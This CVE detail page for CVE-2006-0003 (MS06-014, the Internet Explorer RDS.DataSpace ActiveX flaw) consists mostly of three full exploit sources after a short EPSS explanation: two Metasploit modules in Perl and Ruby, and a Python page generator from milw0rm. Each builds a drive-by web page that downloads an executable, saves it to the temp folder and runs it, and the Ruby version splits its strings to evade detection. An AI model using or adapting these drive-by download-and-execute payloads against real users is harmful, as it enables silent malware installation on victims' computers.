CVE-2006-0003 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::ie_createobject; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket::INET; use IPC::Open3; my $advanced = { 'Gzip' => [1, 'Enable gzip content encoding'], 'Chunked' => [1, 'Enable chunked transfer encoding'], }; my $info = { 'Name' => 'Internet Explorer COM CreateObject Code Execution', 'Version' => '$Revision: 3753 $', 'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ], 'Description' => Pex::Text::Freeform(qq{ This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects. }), 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'winxp', 'win2003' ], 'Priv' => 0, 'UserOpts' => { 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], }, 'Payload' => { 'Space' => 4000, 'Keys' => ['-bind'], }, 'Refs' => [ ['MSB', 'MS06-014'] ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Automatic' ], # Patched [ 'MS06-014 - RDS.DataControl', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'], # Not marked as safe [ 'UNKNOWN - RDS.DataSpace', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'], # Not marked as safe [ 'UNKNOWN - Business Object Factory ', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'], # Not marked as safe [ 'UNKNOWN - Outlook Data Object', '{0006F033-0000-0000-C000-000000000046}'], # Found exploitable in the wild (no details) [ 'UNKNOWN - Outlook.Application', '{0006F03A-0000-0000-C000-000000000046}'], # These are restricted by site (might be exploitable via DNS spoofing + SSL fun) [ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'], [ 'UNKNOWN - SoftwareDistribution.WebControl.1', '{6414512B-B978-451D-A0D8-FCFDF33E833C}'], # Part of the WMI SDK, currently unpatched/unreported [ 'UNKNOWN - WMIScriptUtils.WMIObjectBroker2.1', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'], # Visual Studio components, not marked as safe [ 'UNKNOWN - VsmIDE.DTE', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'], [ 'UNKNOWN - DExplore.AppObj.8.0', '{639F725F-1B2D-4831-A9FD-874847682010}'], [ 'UNKNOWN - VisualStudio.DTE.8.0', '{BA018599-1DB3-44f9-83B4-461454C84BF8}'], [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'], [ 'UNKNOWN - VsaIDE.DTE', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'], ], 'Keys' => [ 'ie' ], 'DisclosureDate' => '', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $server = IO::Socket::INET->new( LocalHost => $self->GetVar('HTTPHOST'), LocalPort => $self->GetVar('HTTPPORT'), ReuseAddr => 1, Listen => 1, Proto => 'tcp' ); my $client; # Did the listener create fail? if (not defined($server)) { $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); return; } my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? Pex::Utils::SourceIP('1.2.3.4') : $self->GetVar('HTTPHOST'); $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); while (defined($client = $server->accept())) { $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); } return; } sub HandleHttpClient { my $self = shift; my $fd = shift; my $shellcode = my $shellcode = $self->GetVar('EncodedPayload')->Payload; # Set the remote host information my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); # Read the HTTP command my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10); # Read the HTTP headers my $headers; while ( (my $line = $fd->RecvLine(10))) { $headers .= $line; last if $line eq "\r\n"; } if ($url =~ /\?payload/) { $self->PrintLine("[*] HTTP Client $rhost:$rport asked for payload..."); my $content = Pex::Utils::CreateWin32PE($shellcode, 'ie_createobject'); $fd->Send($self->BuildResponse($content, 'application/octet-stream')); $fd->Close; return; } $self->PrintLine("[*] HTTP Client $rhost:$rport asked for exploit page..."); $fd->Send($self->BuildResponse($self->GenerateHTML(), 'text/html')); $fd->Close; return; } sub GenerateHTML { my $self = shift; my $target_idx = $self->GetVar('TARGET'); my $objects = ""; if ($target_idx == 0) { foreach my $target (@{ $self->Targets }) { if ($target->[1]) { $objects .= "'".$target->[1]."',"; } } } else { my $target = $self->Targets->[$target_idx]; $objects .= "'".$target->[1]."',"; } my $data = qq# <html><head><title></title> <script language="javascript"> function Log(m) { var log = document.createElement('p'); log.innerHTML = m; document.body.appendChild(log); } function CreateO(o, n) { var r = null; try { eval('r = o.CreateObject(n)') }catch(e){} if (! r) { try { eval('r = o.CreateObject(n, "")') }catch(e){} } if (! r) { try { eval('r = o.CreateObject(n, "", "")') }catch(e){} } if (! r) { try { eval('r = o.GetObject("", n)') }catch(e){} } if (! r) { try { eval('r = o.GetObject(n, "")') }catch(e){} } if (! r) { try { eval('r = o.GetObject(n)') }catch(e){} } return(r); } function Go(a) { Log('Creating helper objects...'); var s = CreateO(a, "WScript.Shell"); var o = CreateO(a, "ADODB.Stream"); var e = s.Environment("Process"); Log('Ceating the XMLHTTP object...'); var url = document.location + '?payload'; var xml = null; var bin = e.Item("TEMP") + "metasploit.exe"; var dat; try { xml=new XMLHttpRequest(); } catch(e) { try { xml = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { xml = new ActiveXObject("MSXML2.ServerXMLHTTP"); } } if (! xml) return(0); Log('Downloading the payload...'); xml.open("GET", url, false) xml.send(null); dat = xml.responseBody; Log('Writing the payload to disk...'); o.Type = 1; o.Mode = 3; o.Open(); o.Write(dat); o.SaveToFile(bin, 2); Log('Executing the payload...'); s.Run(bin,0); } function Exploit() { var i = 0; var t = new Array(${objects}null); while (t[i]) { var a = null; if (t[i].substring(0,1) == '{') { a = document.createElement("object"); a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1)); } else { try { a = new ActiveXObject(t[i]); } catch(e){} } if (a) { try { var b = CreateO(a, "WScript.Shell"); if (b) { Log('Loaded ' + t[i]); Go(a); return(0); } } catch(e){} } i++; } Log('Exploit failed.'); } </script> </head> <body onload='Exploit()'> <p>Initializing...</p> </body> </html> #; } sub BuildResponse { my ($self, $content, $type) = @_; $type ||= 'text/plain'; my $response = "HTTP/1.1 200 OK\r\n" . "Content-Type: $type\r\n"; if ($self->GetVar('Gzip')) { $response .= "Content-Encoding: gzip\r\n"; $content = $self->Gzip($content); } if ($self->GetVar('Chunked')) { $response .= "Transfer-Encoding: chunked\r\n"; $content = $self->Chunk($content); } else { $response .= 'Content-Length: ' . length($content) . "\r\n" . "Connection: close\r\n"; } $response .= "\r\n" . $content; return $response; } sub Chunk { my ($self, $content) = @_; my $chunked; while (length($content)) { my $chunk = substr($content, 0, int(rand(10) + 1), ''); $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; } $chunked .= "0\r\n\r\n"; return $chunked; } sub Gzip { my $self = shift; my $data = shift; my $comp = int(rand(5))+5; my($wtr, $rdr, $err); my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); print $wtr $data; close ($wtr); local $/; return (<$rdr>); } 1; # milw0rm.com [2006-08-10]

## # $Id: ie_createobject.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Seh include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, # In badly misconfigured situations, IE7 and 8 could be vulnerable to # this, but by default they throw an ugly popup that stops all script # execution until the user deals with it and aborts everything if they # click "no". Not worth the risk of being unable to try more recent # exploits. Make sure service packs on top of 6.0 are considered less # than the max by setting to 6.1 (which doesn't really exist). :ua_maxver => "6.1", :javascript => true, :os_name => OperatingSystems::WINDOWS, :vuln_test => 'CreateObject', :classid => [ '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', ], #:rank => ExcellentRanking # reliable exe writer }) def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer COM CreateObject Code Execution', 'Description' => %q{ This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects. }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm', ], 'Version' => '$Revision: 10394 $', 'References' => [ # MDAC [ 'MSB', 'MS06-014' ], [ 'CVE', '2006-0003' ], [ 'OSVDB', '24517' ], # WMI Object Broker [ 'MSB', 'MS06-073' ], [ 'CVE', '2006-4704' ], [ 'OSVDB', '30155' ], ], 'Payload' => { 'Space' => 2048, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], # Patched [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ], # Found in mpack [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ], # Patched [ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ], # These are restricted by site (might be exploitable via DNS spoofing + SSL fun) [ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ], [ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ], # Visual Studio components, not marked as safe [ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ], [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ], [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ], [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ], [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ], # # The controls below can launch the "installing component" dialogs... # # Not marked as safe [ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ], # Not marked as safe [ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ], # Found exploitable in the wild (no details) [ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 11 2006')) end def on_request_uri(cli, request) if (request.uri.match(/payload/)) return if ((p = regenerate_payload(cli)) == nil) data = generate_payload_exe({ :code => p.encoded }) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return end # Build out the HTML response page var_html = rand_text_alpha(rand(30)+2) var_func_exploit = rand_text_alpha(rand(30)+2); var_func_go = rand_text_alpha(rand(30)+2); var_func_createo = rand_text_alpha(rand(30)+2); var_exe_name = rand_text_alpha(rand(30)+2); var_objects = '' # Build the object list based on target selection if (target.name == 'Automatic') targets.each do |t| next if not t['CLSID'] var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + "," end else var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + "," end content = %Q^ <html><head><title></title> <script language="javascript"> function #{var_func_createo}( o , n ) { var r = null; try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){} if (! r) { try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){} } if (! r) { try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){} } if (! r) { try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){} } if (! r) { try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){} } if (! r) { try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){} } return( r ); } function #{var_func_go}( a ) { var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ); var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" ); var e = s.Environment( "P" + "ro" + "ce" + "ss" ); var url = document.location + '/p' + 'ay' + 'lo' + 'ad'; var xml = null; var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe"; var dat; try { xml=new XMLHttpRequest(); } catch(e) { try { xml = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { xml = new ActiveXObject("MSXML2.ServerXMLHTTP"); } } if (! xml) { return(0); } xml.open("GET", url, false); xml.send(null); dat = xml.responseBody; o.Type = 1 ; o.Mode = 3 ; o.Open ( ) ; o.Write ( dat ) ; o.SaveToFile ( bin, 2) ; s.Run ( bin , 0 ); } function #{var_func_exploit}( ) { var i = 0; var t = new Array( #{var_objects} null ); while (t[i]) { var a = null; if (t[i].substring(0,1) == '{') { a = document.createElement("object"); a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ; } else { try { a = new ActiveXObject(t[i]); } catch(e){} } if (a) { try { var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ; if (b) { #{var_func_go}( a ) ; return(0) ; } } catch(e){ } } i++; } } </script> </head> <body onload='#{var_func_exploit}()'> #{var_html} </body> </html> ^ content = Rex::Text.randomize_space(content) print_status("Sending #{self.name} exploit HTML to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end

#!/bin/sh - "exec" "python" "-O" "$0" "$@" __doc__ = """[BL4CK] - MS06-014 RDS.DataStore - Data Execution CVS-2006-0003 MS06-014 April 2006 *** this is a bit out-dated, but works very well *** Usage: ./bl4ck_ms06_014.py http://omfg.what.ho.st/~user/stage2.exe index.html Now upload index.html to the same webserver hosting your http://omfg.what.ho.st/~user/stage2.exe - redsand@blacksecurity.org """ __version__ = "1.0" import sys, random class MS06014: __version = "'[BL4CK] MS06-014 " + __version__ + "\r\n" __html = """ <title></title> <head></head> <body> <script language="VBScript"> on error resume next BL4CK_PAYLOAD </script> <head> <title>[BL4CK] || 404 Not Found</title> </head><body> <h1>Not Found</h1> pwn3d!! <hr> <!-- <script>location.href='http://google.com'</script> --> </body> </html> """ __payload = """ ' due to how ajax works, the file MUST be within the same local domain dl = "URLFILE" ' create adodbstream object Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 ' xml ajax req str6="GET" x.Open str6, dl, False x.Send ' Get temp directory and create our destination name fname1="bl4ck.com" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) ' Get tmp folder fname1= F.BuildPath(tmp,fname1) S.open ' open adodb stream and write contents of request to file ' like vbs dl+exec code S.write x.responseBody ' Saves it with CreateOverwrite flag S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 """ def __init__(self, file): self.__file = file def bl4ck(self): self.__payload = self.__payload.replace("URLFILE",self.__file) encoded = self.__payload ret = self.__html.replace("BL4CK_PAYLOAD",encoded) return ret if __name__ == '__main__': url=False out=False print "[BL4CK] MS06-014 - redsand@blacksecurity.org" print "url path to file must be on the same domain as the htm file" print "http://blacksecurity.org\r\n" argc = len(sys.argv) if(argc <= 2): print "USAGE: %s <download url> <outfile>" % sys.argv[0] sys.exit(0) if(argc > 1): url = sys.argv[1] if(argc > 2): out = sys.argv[2] ms = MS06014(url) ret = ms.bl4ck() try: fsock = open(out, "w+", 0) try: fsock.write(ret ); finally: fsock.close() except IOError: pass print "Wrote %r bytes to: %s" % (len(ret),out) # milw0rm.com [2006-07-21]